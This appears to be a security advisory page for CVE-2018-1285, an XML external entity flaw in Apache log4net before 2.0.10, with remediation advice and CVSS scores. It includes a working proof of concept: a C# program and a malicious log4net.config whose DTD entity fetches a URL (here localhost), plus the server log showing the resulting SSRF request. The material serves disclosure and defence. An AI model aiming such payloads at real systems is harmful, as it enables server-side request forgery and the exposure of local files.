We found results for “”
CVE-2018-1285
Date: May 11, 2020
Overview
Apache log4net is an open-source utility that allows developers to output log statements to a wide range of logging targets flexibly and fast. The tool is configured using an XML configuration file, which is easily readable and updateable. Its affected versions allow an attacker to transmit tainted XML data via configuration files and harm the application.Details
The CVE-2018-1285 vulnerability exists because of how log4net parses XML configuration files in applications where it is permitted to undertake XML external entity processing. If XML external entities when parsing configuration files are not disabled, an intruder could leverage this vector to stage an attack.An attacker could make malicious changes to an XML configuration file, which is defined using the Document Type Definition (DTD) structural style, making the XML parser to embed incorrect content into its output. As a result, the attacker could force the processing application to expose sensitive data contained in local files, initiate a denial of service, or cause other system impacts.
This type of attack is called XXE attacks, which is the shortened version for the term "XML eXternal Entities" attacks.
PoC Details
Environment:.NET Framework 4
Log4net 2.0.8
Python 3.9.1.
Below is a simple .NET framework application which uses Log4net to log an informative message.
The application reads from log4net.config file, which contains a malicious XXE which sends an http request to an arbitrary address (for demonstration purposes it will be "localhost" at port 8000).
Set up a simple python server serving port 8000 at "localhost".
Now build and run the application, and you will see a new request received at the python server side, proving SSRF through XXE.
PoC Code
// Program.cs - the application
using System.IO;
using System.Reflection;
using log4net;
using log4net.Config;
namespace CVE_2018_1285
{
class Program
{
private static readonly ILog log = LogManager.GetLogger(typeof(Program));
static void Main(string[] args)
{
var logRepository = LogManager.GetRepository(Assembly.GetEntryAssembly());
XmlConfigurator.Configure(logRepository, new FileInfo("log4net.config"));
log.Info("Info");
}
}
}
// log4net.config content:
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://localhost:8000/">
]>
<foo>&xxe;</foo>
// for simple python server, on cmd:
> python -m http.server
// When running the built application, the following request is logged at the server side:
::1 - - [24/Aug/2021 10:18:48] "GET / HTTP/1.1" 200
Affected Environments
Apache log4net versions before 2.0.10Remediation
Do not permit arbitrary configurations files to be specified from untrusted users Disable DTDs completelyPrevention
Update to log4net version 2.0.10 or higherLanguage: C#
Good to know:
Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | None |
User Interaction (UI): | None |
Scope (S): | Unchanged |
Confidentiality (C): | High |
Integrity (I): | High |
Availability (A): | High |
Base Score: |
|
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | Low |
Authentication (AU): | None |
Confidentiality (C): | Partial |
Integrity (I): | Partial |
Availability (A): | Partial |
Additional information: |